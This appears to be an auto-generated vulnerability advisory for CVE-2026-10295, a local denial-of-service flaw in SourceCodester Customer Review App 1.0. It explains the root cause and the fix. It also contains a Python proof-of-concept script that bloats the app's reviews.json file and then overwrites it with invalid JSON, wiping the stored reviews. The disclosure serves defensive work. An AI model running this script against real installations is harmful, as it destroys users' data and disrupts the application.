VYPR
← All advisories
Low severity3.3NVD Advisory· Published Jun 1, 2026

CVE-2026-10295

CVE-2026-10295

Description

SourceCodester Customer Review App 1.0 is vulnerable to denial of service via improper input validation in review_app.py, allowing local attackers to crash the application.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

SourceCodester Customer Review App 1.0 is vulnerable to denial of service via improper input validation in review_app.py, allowing local attackers to crash the application.

Vulnerability

A vulnerability exists in SourceCodester Customer Review App 1.0, specifically within the add_review, save_review, and get_all_reviews functions in the review_app.py file. The application fails to validate user-supplied input in the name and comment fields before writing to the local reviews.json file. This improper input validation can lead to a denial of service condition. The attack requires a local approach [1].

Exploitation

An attacker with local access can exploit this vulnerability by providing manipulated input to the name or comment arguments. The add_review function retrieves input from self.name_entry and self.comment_text without performing length or character validation. This unsanitized input is then passed to save_review, which directly writes it to the reviews.json file using json.dump. The get_all_reviews function uses a bare except clause that silently suppresses all errors, potentially leading to data loss or application instability [1].

Impact

Successful exploitation of this vulnerability results in a denial of service. The application may crash or become unstable due to the improper handling of malformed input written to the JSON storage file. The scope of the impact is limited to the local instance of the application, as the attack requires local access [1].

Mitigation

No specific patched version or release date for a fix has been disclosed in the available references. As of the publication of this vulnerability, no workarounds or official mitigation strategies have been provided by the vendor. The software is version 1.0 [1, 2].

References
  1. SourceCodester Customer Review App 1.0 - Improper Input Validation (PoC) - Pastebin.com

AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The application fails to validate user-supplied input in the name and comment fields before writing to a local JSON file."

Attack vector

An attacker with local access can exploit this vulnerability by providing excessively large input for the 'name' and 'comment' fields. This oversized input is written directly to the `reviews.json` file without any length validation [ref_id=1]. Subsequently, when the application attempts to load this bloated file, it can lead to a denial of service due to excessive memory consumption or processing time [ref_id=1]. Additionally, corrupting the JSON structure in `reviews.json` can cause silent data loss [ref_id=1].

Affected code

The vulnerability resides in the `review_app.py` file, specifically within the `add_review()`, `save_review()`, and `get_all_reviews()` functions. The `add_review()` function retrieves user input without length validation, and `save_review()` writes this unsanitized input directly to the `reviews.json` file. The `get_all_reviews()` function uses a bare `except` clause that silently suppresses errors [ref_id=1].

What the fix does

The suggested fix involves implementing input length validation for both the name and comment fields to reject oversized input. Additionally, the bare `except` clause in `get_all_reviews()` should be replaced with specific exception handling for `json.JSONDecodeError` and `IOError` to prevent silent data loss and provide informative error messages [ref_id=1].

Preconditions

  • inputThe attacker must be able to provide input to the 'name' and 'comment' fields.
  • authThe attacker must have local access to the application.

Reproduction

Run the following script while the app is installed: -------------------------------------------------------------- import json import os # Target file written by the app db_file = "reviews.json" # PoC 1: Denial of Service via oversized input # Simulates submitting a 10MB comment field malicious_review = { "name": "A" * 1000000, # 1MB name "rating": 5, "comment": "B" * 9000000 # 9MB comment } reviews = [] if os.path.exists(db_file): with open(db_file, "r") as f: reviews = json.load(f) reviews.insert(0, malicious_review) with open(db_file, "w") as f: json.dump(reviews, f, indent=4) print("[+] PoC 1 complete: reviews.json bloated to ~10MB") print("[+] App will now lag or freeze on load due to unbounded data") # PoC 2: Silent data loss via JSON corruption # The bare except in get_all_reviews() will silently return [] with open(db_file, "w") as f: f.write("{ INVALID JSON !!! }") print("[+] PoC 2 complete: reviews.json corrupted") print("[+] App silently returns empty list — all reviews lost, no warning shown") --------------------------------------------------------------

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

6

News mentions

0

No linked articles in our index yet.